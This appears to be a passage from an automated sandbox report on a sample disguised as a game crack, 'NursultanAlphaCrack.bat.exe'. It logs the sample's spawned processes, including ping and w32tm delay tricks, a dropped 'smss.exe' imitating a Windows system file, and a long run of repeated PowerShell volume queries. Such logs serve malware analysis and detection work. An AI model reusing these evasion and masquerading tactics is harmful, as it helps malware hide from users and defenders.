                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows NT\smss.exe "C:\Program Files\Windows NT\smss.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001DF654 cpuid 0_2_001DF654
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_001DAF0F
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeQueries volume information: C:\portsurrogateFontCrt\BlockcontainerWin.exe VolumeInformationJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
